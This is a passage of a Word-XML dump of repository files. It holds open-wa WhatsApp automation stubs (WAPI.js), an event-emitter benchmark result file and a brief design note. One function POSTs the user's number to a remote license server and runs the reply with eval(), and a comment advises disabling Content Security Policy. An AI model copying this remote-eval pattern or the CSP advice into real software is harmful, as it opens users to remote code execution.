          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setGroupToAdminsOnly = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setGroupEditToAdminsOnly = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.postTextStatus = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.postImageStatus = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.postVideoStatus = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.onRemovedFromGroup = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.onContactAdded = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.sendReplyWithMentions = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.clearAllChats = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getCommonGroups = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setChatBackgroundColourHex = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.darkMode = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.onChatOpened = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.onStory = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getStoryViewers = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.onChatState = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getStickerDecryptable = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.forceStaleMediaUpdate = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setProfilePic = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setGroupDescription = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.setGroupTitle = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.tagEveryone = function ()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Patches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window.WAPI.sendGiphyAsSticker = function () { return false; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getBlockedIds = function () { return false;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window.WAPI.quickClean = function (ob) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var r = JSON.parse(JSON.stringify(ob));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (r.mediaData &amp;&amp; Object.keys(r.mediaData).length == 0) delete r.mediaData;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (r.chat &amp;&amp; Object.keys(r.chat).length == 0) delete r.chat;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Object.keys(r).filter(k =&gt; r[k] == "" || r[k] == [] || r[k] == {} || r[k] == null).forEach(k =&gt; delete r[k]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Object.keys(r).filter(k =&gt; r[k] ? r[k]._serialized : false).forEach(k =&gt; r[k] = r[k]._serialized);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Object.keys(r).filter(k =&gt; r[k] ? r[k].id : false).forEach(k =&gt; r[k] = r[k].id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 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window.WAPI.pyFunc = async function (fn, done) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return done(await fn())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If you're using WAPI.js outside of open-wa: https://github.com/open-wa/wa-automate-nodejs/ then you can use the following code to enable the locked features above if you've got a license keu.</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WILL NOT WORK OUT OF THE BOX. YOU WILL NEED TO DISAVLE CONTENT SECURITY POLICY (WHICH IS HIGHLY DISCOURAGED AND THE MAINTAINERS OF THIS CODE ASSUME NO RESPONSIBILITY FOR AY SECURITY VUNERABILITIES RESULTING IN DISABLING CSP)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meant to act as an example of how to enable new features in wapi.js. You should implement this outside of the WA WEB browser context.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use google to find out how to disable CSP. You can also use this extension: https://chrome.google.com/webstore/detail/disable-content-security/ieelmcmcagommplceebfedjlakkhpden/related?hl=en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window.WAPI.addLicenseKey = async function (key) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const pkgR = await fetch('https://raw.githubusercontent.com/open-wa/wa-automate-nodejs/master/package.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const pkg = await pkgR.json();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const body = JSON.stringify({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        number: Store.Me.me._serialized,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        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 = await fetch(pkg.licenseCheckUrl, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        mode: 'cors',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        cache: 'no-cache',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        headers: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            'Content-Type': 'application/json'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credentials: 'same-origin',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        redirect: 'follow',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        referrerPolicy: 'no-referrer',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        body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x = await r.text()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return eval(x);</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packages/core/src/transport/assets/wapi.js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packages/hyperemitter/benchmarks/baseline/results/baseline-node-20.8.0.json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"meta": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "nodeVersion": "20.8.0",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "date": "2025-12-10T21:01:48.069Z",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "iterations": 200000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "warmup": 20000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"exact": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "node:events": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 24776623.201804563,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 40.360625088214874,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 8.072125017642975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"eventemitter3": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 65228913.23291844,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 15.330624878406525,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 3.066124975681305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"eventemitter2": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 33949372.862869516,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 29.455625116825104,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 5.891125023365021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"emittery": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 513965.4579144545,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 1945.656044781208,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 389.1312089562416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"mitt": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 18363434.3054735,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 54.45604473352432,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 10.891208946704865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"tseep": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "skipped": true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "reason": "module not installed"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"wildcard": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "eventemitter2": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 2834857.194209256,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 352.7514550089836,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 70.55029100179672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"emittery": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "opsPerSec": 250568.0195367393,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "nsPerOp": 3990.932289958,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      "durationMs": 798.1864579916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packages/hyperemitter/benchmarks/baseline/results/baseline-node-20.8.0.json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packages/legacy-documented/src/api/functions/exposed.enum.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/functions/exposed.enum.ts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`packages/legacy/src/api/functions/exposed.enum.ts`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Small enum describing function names intended to be exposed/bridged around the page/client boundary.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Enumerates a minimal callback set:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onMessage`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onAnyMessage`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onAck`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onParticipantsChanged`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onStateChanged`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Tiny file, but useful as a compact snapshot of which callback names were considered special enough to centralize.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Core exposed callback names should be centralized somewhere authoritative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Callback naming should stay consistent between bridge code, client registration, and page exposure logic.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Central callback-name inventory | Preserve | Useful consistency anchor. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
